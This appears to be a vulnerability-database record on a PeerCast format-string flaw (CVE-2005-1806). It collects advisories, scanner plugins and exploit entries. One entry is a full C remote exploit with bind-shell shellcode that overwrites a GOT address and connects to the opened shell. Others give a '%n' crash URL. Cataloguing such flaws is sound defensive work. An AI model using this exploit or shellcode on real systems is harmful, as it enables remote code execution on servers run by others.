{"gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1806"], "edition": 1, "description": "### Background\n\nPeerCast is a media streaming system based on P2P technology. \n\n### Description\n\nJames Bercegay of the GulfTech Security Research Team discovered that PeerCast insecurely implements formatted printing when receiving a request with a malformed URL. \n\n### Impact\n\nA remote attacker could exploit this vulnerability by sending a request with a specially crafted URL to a PeerCast server to execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PeerCast users should upgrade to the latest available version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/peercast-0.1212\"", "modified": "2006-05-22T00:00:00", "published": "2005-06-19T00:00:00", "id": "GLSA-200506-15", "href": "https://security.gentoo.org/glsa/200506-15", "type": "gentoo", "title": "PeerCast: Format string vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-01-24T14:28:39", "description": "Peercast < 0.1211 - Format String. CVE-2005-1806. Dos exploit for Windows platform", "published": "2015-05-28T00:00:00", "type": "exploitdb", "title": "Peercast < 0.1211 - Format String", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1806"], "modified": "2015-05-28T00:00:00", "id": "EDB-ID:43826", "href": "https://www.exploit-db.com/exploits/43826/", "sourceData": "Peercast Format String Vulnerability\r\n\r\nVendor: peercast.org\r\nProduct: Peercast\r\nVersion: <= 0.1211\r\nWebsite: http://www.peercast.org/\r\n\r\nBID: 13808 \r\nCVE: CVE-2005-1806 \r\nOSVDB: 16906 \r\nSECUNIA: 15536 \r\nPACKETSTORM: 39355 \r\n\r\nDescription:\r\nPeercast is a popular p2p streaming media server (similar to shoutcast). There is a serious security issue in peercast versions 0.1211 and earlier that may allow for an attacker to execute arbitrary code on the remote target with the privileges of the user running peercast (usually administrator) or crash the vulnerable server. There is an updated version of peercast available and all users should upgrade as soon as possible. \r\n\r\n\r\nFormat String Vulnerability:\r\nThere is a very dangerous format string issue in peercast that may allow for an attacker to execute arbitrary code on the remote target with the privileges of the user running peercast or crash the vulnerable server. Below is an example of how this vulnerability can be exploited to crash a vulnerable server. \r\n\r\nhttp://localhost:7144/html/en/index.htm%n \r\n\r\nThe problem occurs because of the way some error messages are handled. For example in the above example the peercast server receives a malformed request, so the error routine printed the URL, but the error print routine (because it was a printf type function call) then tries to parse the malicious url. \r\n\r\n\r\nSolution:\r\nThanks to Giles from Peercast for fixing this issue fast and releasing a patch in just a few hours. Now that is a quick turn around!\r\nhttp://www.peercast.org/forum/viewtopic.php?p=11596 \r\n\r\n\r\nCredits:\r\nJames Bercegay of the GulfTech Security Research Team", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43826/"}, {"lastseen": "2016-01-31T13:27:30", "description": "PeerCast <= 0.1211 Remote Format String Exploit. CVE-2005-1806. Remote exploit for linux platform", "published": "2005-06-20T00:00:00", "type": "exploitdb", "title": "PeerCast <= 0.1211 - Remote Format String Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1806"], "modified": "2005-06-20T00:00:00", "id": "EDB-ID:1055", "href": "https://www.exploit-db.com/exploits/1055/", "sourceData": "/*\r\n\\\t\tPeerCast <= 0.1211 remote format string exploit \r\n/\t\t\t [<< Public Release >>]\r\n\\\r\n/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] \r\n\\\t\t\t\t\t\t\t\t\r\n/\tuKt researcherz [ http://unl0ck.org ]\r\n\\\r\n/ greetz goes to: uKt researcherz.\r\n\\\r\n/\r\n\\ - smallest code - better code!!!\r\n/\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdarg.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n\r\n\r\n//*******************************************\r\n#define doit( b0, b1, b2, b3, addr ) { \\\r\n b0 = (addr >> 24) & 0xff; \\\r\n b1 = (addr >> 16) & 0xff; \\\r\n b2 = (addr >> 8) & 0xff; \\\r\n b3 = (addr ) & 0xff; \\\r\n}\r\n//*******************************************\r\n\r\n\r\n\r\n//****************************************************************\r\nchar shellcode[] = // binds 4444 port\r\n\"\\x31\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x85\"\r\n\"\\x4f\\xca\\xdf\\x83\\xeb\\xfc\\xe2\\xf4\\xb4\\x94\\x99\\x9c\\xd6\\x25\\xc8\\xb5\"\r\n\"\\xe3\\x17\\x53\\x56\\x64\\x82\\x4a\\x49\\xc6\\x1d\\xac\\xb7\\x94\\x13\\xac\\x8c\"\r\n\"\\x0c\\xae\\xa0\\xb9\\xdd\\x1f\\x9b\\x89\\x0c\\xae\\x07\\x5f\\x35\\x29\\x1b\\x3c\"\r\n\"\\x48\\xcf\\x98\\x8d\\xd3\\x0c\\x43\\x3e\\x35\\x29\\x07\\x5f\\x16\\x25\\xc8\\x86\"\r\n\"\\x35\\x70\\x07\\x5f\\xcc\\x36\\x33\\x6f\\x8e\\x1d\\xa2\\xf0\\xaa\\x3c\\xa2\\xb7\"\r\n\"\\xaa\\x2d\\xa3\\xb1\\x0c\\xac\\x98\\x8c\\x0c\\xae\\x07\\x5f\";\r\n//****************************************************************\r\n\r\n\r\n//****************************\r\n#define HOST \"127.0.0.1\"\r\n#define PORT 7144\r\n#define GOTADDR 0x0809da9c\r\n#define SHELLADDR 0x49adb23c\r\n//****************************\r\n\r\n\r\n\r\n//****************************************************************************************\r\nchar *\r\nevil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )\r\n{\r\n char * buf;\r\n unsigned char b0, b1, b2, b3;\r\n int start = 256;\r\n\r\n doit( b0, b1, b2, b3, retaddr );\r\n buf = (char *)malloc(999);\r\n memset( buf, 0, 999 );\r\n\r\n b3 -= figure;\r\n b2 -= figure;\r\n b1 -= figure;\r\n b0 -= figure;\r\n\r\n snprintf( buf, 999,\r\n \"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n\",\r\n\t b3 - 16 + start - base, offset, \r\n b2 - b3 + start, offset + 1, \r\n b1 - b2 + start, offset + 2,\r\n b0 - b1 + start, offset + 3 );\r\n\r\n return buf;\r\n}\r\n//****************************************************************************************\r\n\r\n\r\n\r\n\r\n//****************************************************************************************\r\nint\r\nmain( int argc, char * argv[] )\r\n{\r\n struct sockaddr_in addr;\r\n int sock;\r\n char * fmt;\r\n char endian[31337], da_shell[31337];\r\n unsigned long locaddr, retaddr;\r\n unsigned int offset, base;\r\n unsigned char b0, b1, b2, b3;\r\n\r\n system(\"clear\");\r\n printf(\"*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\\n\");\r\n printf(\"*^*^*^ by Darkeagle ^*^*^*\\n\");\r\n printf(\"*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\\n\\n\"); \r\n\r\n memset( endian, 0x00, 31337 );\r\n memset( da_shell, 0x00, 31337 );\r\n\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(PORT);\r\n addr.sin_addr.s_addr = inet_addr(HOST);\r\n\r\n sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);\r\n\r\n locaddr = GOTADDR;\r\n retaddr = SHELLADDR;\r\n offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141\r\n\r\n doit( b0, b1, b2, b3, locaddr );\r\n\r\n base = 4;\r\n printf(\"[*] Buildin' evil code\\n\");\r\n strcat(endian, \"GET /html/en/index.html\");\r\n snprintf( endian+strlen(endian), sizeof(endian),\r\n \"%c%c%c%c\"\r\n \"%c%c%c%c\"\r\n \"%c%c%c%c\"\r\n \"%c%c%c%c\",\r\n b3, b2, b1, b0,\r\n b3 + 1, b2, b1, b0,\r\n b3 + 2, b2, b1, b0,\r\n b3 + 3, b2, b1, b0 );\r\n\r\n fmt = evil_builder( retaddr, offset, base, 0x10 );\r\n\r\n memset(fmt+strlen(fmt), 0x55, 32);\r\n strcat(fmt, shellcode);\r\n strcat(endian, fmt);\r\n strcat(endian, \"\\r\\n\\r\\n\\r\\n\");\r\n printf(\"[+] Buildin' complete!\\n\");\r\n sprintf(da_shell, \"telnet %s 4444\", HOST);\r\n\r\n // just go, y0!\r\n printf(\"[*] Connectin'\\n\");\r\n if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf(\"[-] Connection failed!\\n\\n\"); exit(0); }\r\n\r\n printf(\"[+] Connected!\\n\");\r\n printf(\"[*] Sleepin'\\n\");\r\n sleep(1);\r\n\r\n printf(\"[*] Sendin'\\n\");\r\n send(sock, endian, strlen(endian), 0);\r\n\r\n printf(\"[*] Sleepin'\\n\");\r\n sleep(1);\r\n \t\r\n printf(\"[*] Connectin' in da shell\\n\\n\");\r\n sleep(1);\r\n system(da_shell);\r\n return 0;\r\n}\r\n//****************************************************************************************\n\n// milw0rm.com [2005-06-20]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1055/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1806"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.peercast.org/\n[Vendor Specific Advisory URL](http://www.peercast.org/forum/viewtopic.php?p=11596)\n[Secunia Advisory ID:15536](https://secuniaresearch.flexerasoftware.com/advisories/15536/)\n[Secunia Advisory ID:15753](https://secuniaresearch.flexerasoftware.com/advisories/15753/)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00077-05282005\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200506-15.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0335.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/5WP0M0AG0Q.html\n[CVE-2005-1806](https://vulners.com/cve/CVE-2005-1806)\n", "modified": "2005-05-28T05:01:01", "published": "2005-05-28T05:01:01", "href": "https://vulners.com/osvdb/OSVDB:16906", "id": "OSVDB:16906", "title": "PeerCast URL Error Message Format String", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1806"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200506-15.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54967", "href": "http://plugins.openvas.org/nasl.php?oid=54967", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200506-15 (peercast)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PeerCast suffers from a format string vulnerability that could allow\narbitrary code execution.\";\ntag_solution = \"All PeerCast users should upgrade to the latest available version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/peercast-0.1212'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200506-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=96199\nhttp://www.gulftech.org/?node=research&article_id=00077-05282005\nhttp://www.peercast.org/forum/viewtopic.php?p=11596\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200506-15.\";\n\n \n\nif(description)\n{\n script_id(54967);\n script_cve_id(\"CVE-2005-1806\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200506-15 (peercast)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/peercast\", unaffected: make_list(\"ge 0.1212\"), vulnerable: make_list(\"lt 0.1212\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:42", "description": "\nPeercast 0.1211 - Format String", "edition": 1, "published": "2015-05-28T00:00:00", "title": "Peercast 0.1211 - Format String", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1806"], "modified": "2015-05-28T00:00:00", "id": "EXPLOITPACK:8D3CFD2145F13C96B414312BD3B4D3F6", "href": "", "sourceData": "Peercast Format String Vulnerability\n\nVendor: peercast.org\nProduct: Peercast\nVersion: <= 0.1211\nWebsite: http://www.peercast.org/\n\nBID: 13808 \nCVE: CVE-2005-1806 \nOSVDB: 16906 \nSECUNIA: 15536 \nPACKETSTORM: 39355 \n\nDescription:\nPeercast is a popular p2p streaming media server (similar to shoutcast). There is a serious security issue in peercast versions 0.1211 and earlier that may allow for an attacker to execute arbitrary code on the remote target with the privileges of the user running peercast (usually administrator) or crash the vulnerable server. There is an updated version of peercast available and all users should upgrade as soon as possible. \n\n\nFormat String Vulnerability:\nThere is a very dangerous format string issue in peercast that may allow for an attacker to execute arbitrary code on the remote target with the privileges of the user running peercast or crash the vulnerable server. Below is an example of how this vulnerability can be exploited to crash a vulnerable server. \n\nhttp://localhost:7144/html/en/index.htm%n \n\nThe problem occurs because of the way some error messages are handled. For example in the above example the peercast server receives a malformed request, so the error routine printed the URL, but the error print routine (because it was a printf type function call) then tries to parse the malicious url. \n\n\nSolution:\nThanks to Giles from Peercast for fixing this issue fast and releasing a patch in just a few hours. Now that is a quick turn around!\nhttp://www.peercast.org/forum/viewtopic.php?p=11596 \n\n\nCredits:\nJames Bercegay of the GulfTech Security Research Team", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:51:57", "description": "The remote host is affected by the vulnerability described in GLSA-200506-15\n(PeerCast: Format string vulnerability)\n\n James Bercegay of the GulfTech Security Research Team discovered that\n PeerCast insecurely implements formatted printing when receiving a\n request with a malformed URL.\n \nImpact :\n\n A remote attacker could exploit this vulnerability by sending a request\n with a specially crafted URL to a PeerCast server to execute arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2005-06-20T00:00:00", "title": "GLSA-200506-15 : PeerCast: Format string vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1806"], "modified": "2005-06-20T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:peercast"], "id": "GENTOO_GLSA-200506-15.NASL", "href": "https://www.tenable.com/plugins/nessus/18530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200506-15.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18530);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1806\");\n script_xref(name:\"GLSA\", value:\"200506-15\");\n\n script_name(english:\"GLSA-200506-15 : PeerCast: Format string vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200506-15\n(PeerCast: Format string vulnerability)\n\n James Bercegay of the GulfTech Security Research Team discovered that\n PeerCast insecurely implements formatted printing when receiving a\n request with a malformed URL.\n \nImpact :\n\n A remote attacker could exploit this vulnerability by sending a request\n with a specially crafted URL to a PeerCast server to execute arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.gulftech.org/?node=research&article_id=00077-05282005\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8482b98a\"\n );\n # http://www.peercast.org/forum/viewtopic.php?p=11596\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e6e449b3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200506-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PeerCast users should upgrade to the latest available version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/peercast-0.1212'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:peercast\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/peercast\", unaffected:make_list(\"ge 0.1212\"), vulnerable:make_list(\"lt 0.1212\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PeerCast\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:54:13", "description": "The version of PeerCast installed on the remote host suffers from a\nformat string vulnerability. An attacker can issue requests\ncontaining format specifiers that will crash the server and\npotentially permit arbitrary code execution subject to privileges of\nthe user under which the affected application runs.", "edition": 24, "published": "2005-06-06T00:00:00", "title": "PeerCast URL Error Message Format String", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1806"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "PEERCAST_FORMAT_STRING.NASL", "href": "https://www.tenable.com/plugins/nessus/18417", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18417);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2005-1806\");\n script_bugtraq_id(13808);\n\n script_name(english:\"PeerCast URL Error Message Format String\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote peer-to-peer application is affected by a format string\nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of PeerCast installed on the remote host suffers from a\nformat string vulnerability. An attacker can issue requests\ncontaining format specifiers that will crash the server and\npotentially permit arbitrary code execution subject to privileges of\nthe user under which the affected application runs.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.gulftech.org/?node=research&article_id=00077-05282005\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/May/334\" );\n # http://web.archive.org/web/20071106134310/http://www.peercast.org/forum/viewtopic.php?p=11596\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0438223\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PeerCast 0.1212 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/05/28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks for format string vulnerability in PeerCast\");\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"Peer-To-Peer File Sharing\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"peercast_installed.nasl\");\n script_require_keys(\"PeerCast/installed\");\n script_require_ports(\"Services/www\", 7144, 7145);\n\n exit(0);\n}\n\n\nif (!get_kb_item(\"PeerCast/installed\")) exit(0);\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nlist = get_kb_list(\"PeerCast/*/version\");\nif (isnull(list)) exit(0);\n\nforeach key (keys(list))\n{\n port = key - \"PeerCast/\" - \"/version\";\n ver = list[key];\n\n if (get_port_state(port))\n {\n # If safe checks are enabled...\n if (safe_checks())\n {\n # Check the version.\n vuln = FALSE;\n\n if (ver =~ \"^[0-9]\\.[0-9]+$\")\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (iver[0] == 0 && iver[1] < 1212) vuln = TRUE;\n }\n else if (report_paranoia > 1) vuln = TRUE;\n\n if (vuln)\n {\n report = string(\n \"According to its Server response header, the version of PeerCast on the\\n\",\n \"remote host is :\\n\",\n \"\\n\",\n \" \", ver, \"\\n\"\n );\n security_hole(port:port, extra:report);\n break;\n }\n }\n # Otherwise...\n else\n {\n # Make sure the server's up.\n if (http_is_dead(port:port)) exit(1, \"The web server is dead\");\n\n # Try to crash it.\n r = http_send_recv3(method:\"GET\",item:\"/html/en/index.htm%n\", port:port);\n # There's a problem if the server's down.\n if (http_is_dead(port:port))\n {\n security_hole(port);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
